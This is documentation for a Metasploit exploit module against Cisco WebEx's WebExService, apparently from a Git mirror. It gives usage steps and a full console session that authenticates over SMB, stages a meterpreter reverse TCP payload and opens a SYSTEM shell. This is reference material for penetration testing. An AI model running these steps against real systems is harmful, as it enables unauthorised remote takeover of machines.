adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94e5e49052d4f0f165a3220a488ec33a53b082a2
metasploit-gs/documentation/modules/exploit/windows/smb/webexec.md
T
Shelby Pace 6f58a15e00 removed template line
2018-10-24 15:14:15 -05:00

59 lines
2.1 KiB
Markdown
Raw Blame History

## Description
This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.
Vulnerable WebEx clients come with the `WebExService` that can execute arbitrary commands with System privileges.
Due to insufficient checks on permissions, a local or domain user can start the `WebExService` through a remote connection
and execute code.
## Vulnerable Application
Cisco WebEx software v33.3.8.7 and below
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/smb/webexec```
4. Do: ```set RHOSTS <IP>```
5. Do: ```set SMBUser <USERNAME>```
6. Do: ```set SMBPass <PASSWORD>```
7. Do: ```run```
8. You should get a shell.
## Scenarios
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
```
msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set smbuser a_user
smbuser => a_user
msf5 exploit(windows/smb/webexec) > set smbpass password
smbpass => password
msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
rhosts => 192.168.37.136
msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/smb/webexec) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] 192.168.37.136:445 - Connecting to the server...
[*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
[*] 192.168.37.136:445 - Command Stager progress - 0.96% done (999/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress - 1.91% done (1998/104435 bytes)
...
[*] 192.168.37.136:445 - Command Stager progress - 99.47% done (103880/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink